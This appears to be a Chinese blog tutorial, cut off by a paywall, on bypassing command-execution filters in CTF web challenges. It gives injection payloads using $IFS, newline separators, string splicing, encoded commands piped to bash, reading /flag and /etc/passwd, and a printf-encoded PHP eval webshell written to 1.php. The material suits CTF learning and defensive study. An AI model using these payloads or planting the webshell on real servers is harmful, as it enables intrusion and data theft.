CTF下的命令执行

最新推荐文章于 2024-06-03 10:50:52 发布
最新推荐文章于 2024-06-03 10:50:52 发布
阅读量9.5k 收藏 35
点赞数 7
分类专栏: WEB漏洞学习 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43431158/article/details/105422347
版权

前言:

做web题也经常遇到很多关于命令执行的一些姿势,这次就总结下来。

0x00:一些绕过姿势

在遇到的一些web题中,会经常将以下几种给过滤或者进行限制:

  1. 空格
  2. 命令分隔符
  3. 关键字
  4. 限制长度
  5. 限制回显

等等,这次就通过题目将这些如何绕过的知识给记录下来。

空格绕过
常见的绕过符号有:
$IFS$9 、${
   IFS}%09(php环境下)、 重定向符<><、

#$IFS在linux下表示分隔符,如果不加{
   }则bash会将IFS解释为一个变量名,
加一个{
   }就固定了变量名,$IFS$9后面之所以加个$是为了起到截断的作用

测试一下:
在这里插入图片描述

命令分隔
%0a  --换行符,需要php环境
%0d  --回车符,需要php环境
;  --在 shell 中,是”连续指令”
&  --不管第一条命令成功与否,都会执行第二条命令
&&  --第一条命令成功,第二条才会执行
|  --第一条命令的结果,作为第二条命令的输入
||  --第一条命令失败,第二条才会执行

在这里插入图片描述
例如ctfhub这道题就过滤了命令分割符,用%0a便可以分隔命令进行查看

127.0.0.1%0als

在这里插入图片描述

关键词过滤

假如过滤了关键字cat\flag,无法读取不了flag.php,又该如何去做

拼接绕过

#执行ls命令:
a=l;b=s;$a$b
#cat flag文件内容:
a=c;b=at;c=f;d=lag;$a$b ${
   c}${
   d}
#cat test文件内容
a="ccaatt";b=${
   a:0:1}${
   a:2:1}${
   a:4:1};$b test

编码绕过

#base64
echo "Y2F0IC9mbGFn"|base64 -d|bash ==>cat /flag
echo Y2F0IC9mbGFn|base64 -d|sh==>cat /flag
#hex
echo "0x636174202f666c6167" | xxd -r -p|bash ==>cat /flag
#oct/字节
$(printf "\154\163") ==>ls
$(printf "\x63\x61\x74\x20\x2f\x66\x6c\x61\x67") ==>cat /flag
{
   printf,"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67"}|\$0 ==>cat /flag
#i也可以通过这种方式写马
内容为<?php @eval($_POST['c']);?>
${
   printf,"\74\77\160\150\160\40\100\145\166\141\154\50\44\137\120\117\123\124\133\47\143\47\135\51\73\77\76"} >> 1.php

单引号和双引号绕过

c'a't test
c"a"t test

反斜杠绕过

ca\t test

通过$PATH绕过

#echo $PATH 显示当前PATH环境变量,该变量的值由一系列以冒号分隔的目录名组成
#当执行程序时,shell自动跟据PATH变量的值去搜索该程序
#shell在搜索时先搜索PATH环境变量中的第一个目录,没找到再接着搜索,如果找到则执行它,不会再继续搜索
echo $PATH 
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
`echo $PATH| cut -c 8,9`t test

在这里插入图片描述
通配符绕过

  1. […]表示匹配方括号之中的任意一个字符
  2. {…}表示匹配大括号里面的所有模式,模式之间使用逗号分隔。
  3. {…}与[…]有一个重要的区别,当匹配的文件不存在,[…]会失去模式的功能,变成一个单纯的字符串,而{…}依然可以展开
    在这里插入图片描述
cat t?st
cat te*
cat t[a-z]st
cat t{
   a,b,c,d,e,f}st

在这里插入图片描述

#linux中查看文件内容的命令
cat、tac、more、less、head、tail、nl、sed、sort、uniq
内联执行
内联执行将反引号内命令的输出作为输入执行,类似的还有$(command)
无字母数字构造Webshell
<?php
error_reporting(0);
if(isset($_GET['code'])){
   
            $code=$_GET['code'];
                    if(strlen($code)>40){
   
                                        die("This is too Long.")
最低0.47元/天 解锁文章
lemonl1
关注
  • 7
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ctf命令执行小结
舞动的獾
10-04 4503
1.相关函数 eval函数eval函数能够将字符串当作命令执行 需要被执行的字符串 代码不能包含打开/关闭 PHP tags。比如, ‘echo “Hi!”;’ 不能这样传入: ‘<?php echo "Hi!"; ?>’。但仍然可以用合适的 PHP tag 来离开、重新进入 PHP 模式。比如 ‘echo “In PHP mode!”; ?>In HTML mode!<...
[GXYCTF2019]Ping Ping Ping {命令执行总结}
qq_42812036的博客
02-13 5899
0x00 知识点 命令注入 绕过空格、敏感字符、连接符 0x01 解题 方法一 内联执行 payload ?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php ps: 参数顺序要注意,adc换位acdflag会被检测出来:) 过滤了?/\{}()[]* 否则bash语法可以用“?”,正斜杠“/”,数字和字母来执行系统命令。 过滤空格 1.使用<或者<&gt...
CTF-命令执行部分总结
weixin_44770698的博客
05-29 1698
因为自己是小白,还是想着尽量快一点的学习到许多知识,最近又做了CTFshow里面的部分萌新题,这里总结一下其中的部分萌新WEB题。 web 9 要求我们使用GET方式传入c参数,参数中还要匹配到system或者exec等关键字,这里算是一个小坑,还以为是不能有这些关键字,还尝试了passthru、和拼接绕过......很尴尬。 这个比较简单我们使用system来执行查看config.php就可以了。 web 10 这个题的含义就是正则匹配到system、exec等,则会提示你cmd e
CTF中的命令执行绕过方式
最新发布
2401_84466223的博客
06-03 752
cat $b$a绕过空格就用上面提到的$IFS$1完整的payload 1;shell 提供了 && 和 || 来实现命令执行控制的功能,shell 将根据 && 或 || 前面命令的返回值来控制其后面命令执行。连续使用管道意味着第一个命令的输出会作为 第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。默认情况下,进程是前台进程,这时就把Shell给占据了,我们无法进行其他操作,对于那些没有交互的进程,很多时候,我们希望将其在后台启动,可以在启动参数的时候加一个'&'实现这个目的。
CTF命令执行知识点总结
Hello_super的博客
09-17 1186
分隔命令 ; # 分号隔开每条命令,整行命令按照从左到右的顺序执行,彼此之间互不影响,所有的命令都会执行。 | # 只执行后面那条命令。 || # 只执前面那条命令。 & #两条命令都会执行。 && # 两条命令都会执行。 空格绕过 < <> # 需要写的权限 ${IFS} $IFS$9 %20 %...
ctfshow——54命令执行,需要严格的过滤
manerzi的博客
11-02 957
ctfshow——54命令执行,需要严格的过滤
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
php突破命令限制执行系统命令
05-09
php突破命令限制执行系统命令 可以用于ctf 实战 等多领域使用 十分实用,可以用于突破system等命令被限制的时候
CTF神器_ctf
09-23
3. **获取Webshell**:通过扫描找到可以写入的目录,上传恶意脚本,获取远程命令执行的通道。 4. **验证漏洞**:找到疑似漏洞后,使用Dirsearch验证它们是否真实有效。 5. **了解网站结构**:对于理解网站的架构和...
命令注入讲解ppt.pptx
08-10
命令执行漏洞不仅存在于 B/S 架构中,也存在于 C/S 架构中。本次讨论的都是 Web 中的命令执行漏洞。 命令注入攻击最初被关注到,是 Shell 命令注入攻击(所以最初也被称为 Shell 命令注入攻击),由挪威一名程序员...
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
Linux不管上一条命令成功还是失败都执行下一个命令的方法
suyuesheng的博客
08-25 1997
Linux不管上一条命令成功还是失败都执行下一个命令的方法 Linux不管上一条命令成功还是失败都执行下一个命令的方法就是用; 在用linux命令时候, 我们经常需要同时执行多条命令, 那么命令之间该如何分割呢? 分号: 顺序地独立执行各条命令, 彼此之间不关心是否失败, 所有命令都会执行。 实例 执行root@DESKTOP-FA1P4IO:~/githel# print 123 反馈Err...
ctf 命令执行
weixin_74427106的博客
04-01 283
什么是命令执行漏洞:命令执行漏洞就是服务器端没有对客户的一些命令进行过滤,导致客户任意拼接命令使网站进行执行;过滤了flag所以我们只要命令里不出现flag即可所以构造。这里我不知道为啥不能用一句话木马,后续知道了在补充;运行后打开源码后即可得到flag。运行之后查看源码即可得到flag。ctfshow web入门29。先分析代码发现过滤了.和空格。这里我会个一句话木马。
记录CTF命令执行练习中遇到的几道题(一些PHP命令过滤的绕过方法)
weixin_40103894的博客
10-01 1582
【代码】记录CTF命令执行练习中遇到的几道题(一些PHP命令过滤的绕过方法)
CTFWEB 代码执行&命令执行&CTFSHOW wp
m0_48736242的博客
10-02 2063
CTFWEB 代码执行&命令执行&CTFSHOW wp
Ctfer训练计划】——命令执行的解题技巧(持续更新中)
qq_53058639的博客
11-01 107
执行就可以造成命令执行先用get方式传入一个。
CTF命令执行的常见姿势
weixin_40103894的博客
09-28 1518
1.**cat fl[abc]g.php ** //匹配[abc]中的任何一个。11.**vi **–使用vi打开文本cat 由第一行开始显示内容,并将所有内容输出。1.**wh\o\ami ** //反斜线绕过。3.**cat fla* ** //用*匹配任意。3.**whoa’m’i ** //单引号绕过。4.**whoam``i ** //反引号绕过。8.**nl **–类似于cat -n,显示时输出行号。
[CTF技巧]命令注入绕过总结
3tefanie丶zhou的博客
07-08 3504
命令分隔符 cat /etc/passwd;ls 分号 ; cmd1;cmd2(多条语句顺序执行) cat /etc/passwd && ls and && cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2 cat etc || ls or || cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2 管道符 | | 管道符 管道符”|“
CTFHub 命令注入-无过滤
07-25
CTFHub 命令注入-无过滤是一个题目,它的源代码中存在一个命令注入漏洞。在这个题目中,用户可以通过输入IP地址执行ping命令。\[1\]由于没有采用过滤,用户可以直接进行命令拼接,例如输入"192.168.43.222;ls"可以查看目录下的全部文件。\[2\]在这个题目中,flag被隐藏在网页源代码中。\[3\]为了防止命令注入漏洞,可以对用户输入进行过滤,例如过滤空格。 #### 引用[.reference_title] - *1* *2* [CTFHub -技能树 命令注入-无过滤](https://blog.csdn.net/qq_45653588/article/details/107556087)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFhub——命令执行](https://blog.csdn.net/qq_43277152/article/details/113649643)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值